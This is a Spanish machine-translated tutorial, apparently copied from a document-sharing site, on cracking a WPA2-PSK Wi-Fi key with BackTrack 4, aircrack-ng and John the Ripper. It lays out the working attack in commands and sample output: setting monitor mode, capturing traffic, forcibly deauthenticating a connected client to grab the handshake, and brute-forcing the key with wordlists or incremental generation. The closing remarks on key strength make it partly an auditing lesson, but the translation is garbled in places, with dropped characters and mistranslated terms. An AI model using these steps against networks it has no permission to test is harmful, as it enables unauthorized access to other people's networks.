Você está na página 1de 3

CRACKING WPA2-PSK CON BACKTRACK 4, AIRCRACK-NG Y JOHN EL DESTRIPADOR

Poner la interfaz en modo monitor Buscar red inalmbrica (protegida con WPA2 y una clave previamente compartida) Capturar todos los paquetes Espere hasta que vea a un cliente y des-autenticacin el cliente, por lo que el apretn de manos puede ser capturado Crackear la clave usando un archivo de diccionario (o por medio de John The Ripper) Voy a usar una interfaz de Dlink DWL-G122 (USB) de red inalmbrica para este procedimiento. En backtrack4, este dispositivo se reconoce como wlan0.

En primer lugar, poner la tarjeta en modo monitor:


root@bt:~# airmon-ng Interface wifi0 ath0 ath1 wlan0 Chipset Atheros Atheros Atheros Ralink 2573 USB Driver madwifi-ng madwifi-ng VAP (parent: wifi0) madwifi-ng VAP (parent: wifi0) rt73usb - [phy0]

root@bt:~# airmon-ng start wlan0 Interface wifi0 ath0 ath1 wlan0 Chipset Atheros Atheros Atheros Ralink 2573 USB Driver madwifi-ng madwifi-ng VAP (parent: wifi0) madwifi-ng VAP (parent: wifi0) rt73usb - [phy0] (monitor mode enabled on mon0)

Ok ahora podemos utilizar la interfaz mon0 Vamos a encontrar una red inalmbrica que utiliza WPA2 / PSK:
root@bt:~# airodump-ng mon0 CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57 PWR -33 STATION 00:1C:BF:90:5B:A3 Beacons 5 #Data, #/s 0 PWR -29 0 CH 10 MB 54 Lost 12 ENC CIPHER AUTH ESSID PSK Probe TestNet TestNet

BSSID 00:19:5B:52:AD:F7 BSSID 00:19:5B:52:AD:F7

WPA2 CCMP Packets 4

Rate 0- 1

Dejar de airodump-ng y ejecutar de nuevo, escribiendo todos los paquetes en el disco:


airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

En este punto, usted tiene dos opciones: o bien esperar a que un cliente se conecta y el 4-Way Handshake se haya completado, o des-autenticacin un cliente existente, por lo que la fuerza para volver a asociar. El tiempo es dinero, as que vamos a obligar a los des-autenticacin. Necesitamos que el bssid de la AP (-a) y el Mac de un cliente conectado (-c)
root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0 13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10 13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

Como consecuencia, airodump-ng deber indicar "Apretn de manos WPA:" en la esquina superior derecha
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7 BSSID 00:19:5B:52:AD:F7 BSSID 00:19:5B:52:AD:F7 PWR RXQ -33 100 STATION 00:1C:BF:90:5B:A3 Beacons 1338 PWR -27 #Data, #/s 99 Rate 54-54 0 CH 10 Lost 0 MB 54 ENC CIPHER AUTH ESSID PSK TestNet

WPA2 CCMP Packets 230 Probe

Dejar de airodump-ng y asegrese de que los archivos fueron creados correctamente


root@bt:/# -rw-r--r--rw-r--r--rw-r--r-ls /tmp/wpa2* -al 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

Forma de este momento, usted no necesita estar cerca de la red inalmbrica. Todas las grietas que suceder en lnea, para que pueda dejar airodump y otros procesos e incluso a pie de la AP. De hecho, me permito sugerir a pie y se encuentra un lugar acogedor donde se puede vivir, comer, dormir, etc .... Romper una clave WPA2-PSK se basa en la fuerza bruta, y puede tomar un tiempo muy muy largo. Hay dos formas de fuerza bruta: una que es relativamente rpido, pero no garantiza el xito y uno que es muy lento, pero garantiza que se encuentra la clave en algn momento en el tiempo La primera opcin es el uso de un archivo de lista de trabajo / drstionary. Muchos de estos archivos se pueden encontrar en Internet (por ejemplo, o en www.theargon.com packetstorm (ver los archivos)), o pueden ser generados con herramientas como John The Ripper. Una vez que la lista de palabras se crea, todo lo que necesita hacer es ejecutar aircrack-ng con la lista de trabajo y alimentar la FIE. Tapa que contiene el protocolo de intercambio WPA2. As que si su lista de palabras se llama word.lst (en / tmp / listas de palabras), puede ejecutar
aircrack-ng w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

El xito de cracking la clave WPA2-PSK est directamente relacionado con la fuerza de su archivo de contraseas. En otras palabras, puede que tenga suerte y consigue la llave muy rpido, o puede que no obtenga la clave en absoluto. El segundo mtodo (fuerza bruta) ser un xito seguro, pero puede tomar aos en completarse. Tenga en cuenta, una clave WPA2 puede ser de hasta 64 caracteres, por lo que en teora sera la construccin de todas las combinaciones de contrasea con todos los juegos de caracteres posibles y darles de comer a aircrack. Si desea utilizar John

The Ripper para crear todas las posibles combinaciones de contraseas y darles de comer en aircrack-ng, este es el comando a utilizar:
root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w /tmp/wpa2*.cap

Actualizacin: Despus de 20 horas de formacin de grietas, la clave an no se ha encontrado. El sistema que estoy usando para romper las claves no es muy rpido, pero echemos un vistazo a algunos hechos: 8 caracteres, caracteres sin formato (maysculas y minsculas) o dgitos = cada personaje en la clave podran tiene 26 26 10 (62) combinaciones posibles. Por lo que el nmero mximo de combinaciones que deben ser verificados en el proceso de fuerza bruta es de 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 a alrededor de 600 claves por segundo en mi "lentitud" del sistema, podra tomar ms de 101083382 horas para encontrar la clave (11,539 aos). He dejado el proceso de formacin de grietas en mi mquina es demasiado lento para obtener la clave, mientras que todava estoy vivo ... As que piensa en esto cuando se hace una auditora WPA2-PSK.

Gracias El material fue sacado y traducido de

Corelam Team
se respeta los derechos